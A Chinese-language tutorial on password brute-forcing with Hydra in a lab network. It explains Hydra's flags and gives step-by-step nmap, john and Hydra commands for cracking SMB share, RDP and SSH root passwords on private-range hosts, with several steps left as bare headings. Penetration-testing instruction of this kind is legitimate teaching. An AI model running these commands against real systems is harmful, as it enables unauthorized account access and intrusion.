暴力破解-hydra（二）

1.1 hydra介绍

Hydra对应的英文意思是九头蛇，它是一款爆破神器，可以对多种服务的账号和密码进行爆破，包括Web登录、数据库、SSH、FTP 等服务，支持Linux、Windows、 Mac平台安装，其中Kali Linux中自带Hydra。

1.2 hydra使用

1.2.1 hydra参数解释

-l：指定单个用户名称.
-L：指定用户名称字典
-p：指定单个密码
-P：指定密码字典
-S：指定端口
-vV：显示详细的执行过程
-t：通过-t参数来指定线程数默认是16会造成服务器拒绝连接，切记不能太快
-e：表示提供了更多测试选项，nsr 后面的字母对应更多的测试方式：
    n：是尝试空密码登录
    s：是将用户名作为密码登录
    r：是将用户名反过来作为密码登录，如用户名是root，那么会使用toor尝试破解

1.3 实验环境

1.4 实例：使用hydra破解系统用户密码

1.4.1 破解win7文件共享密码

1.4.1.1 开启windows文件共享

在Windows系统当中，默认会启动一些文件共享，比如C$或ADMIN$ （管理共享），而这些共享是使用smb协议，因此我可以针对smb协议进行破解。

1.4.1.2 扫描445端口是否开启

# nmap 192.168.10.157 -p 445
PORT STATE SERVICE
445/tcp open microsoft-ds

1.4.1.3 生成密码字典

通过john工具生成简单的密码字典，一般的弱口令都会包含进去：

# john --wordlist --rules --stdout > m.txt

1.4.1.4 破解smb文件共享密码

# hydra -l pm -P m.txt smb://192.168.10.157 –vV

1.4.1.5 通过密码远程访问主机资源

在物理机或其他windows主机中打开运行（Win+R）窗口，输入 \\192.168.10.157\c$：

1.4.2 破解win7远程桌面密码

1.4.2.1 开启远程桌面

1.4.2.2 扫描3389端口是否开启

# nmap 192.168.10.157 -p 3389
PORT STATE SERVICE
3389/tcp open ms-wbt-server

1.4.2.3 生成密码字典

参考 《1.4.1.3》章节

1.4.2.4 破解远程桌面密码

# hydra -l pm -P m.txt rdp://192.168.10.157 –vV

1.4.2.5 通过远程桌面访问主机资源

1.4.3 破解ssh服务root密码

1.4.3.1 扫描ssh端口是否开启

# nmap 192.168.10.80 -p 22
PORT STATE SERVICE
22/tcp open ssh

1.4.3.2 生成密码字典

参考 《1.4.1.3》章节

1.4.3.3 破解ssh远程密码

# hydra -l root -P m.txt -t 4 ssh://192.168.10.80 -e nsr –vV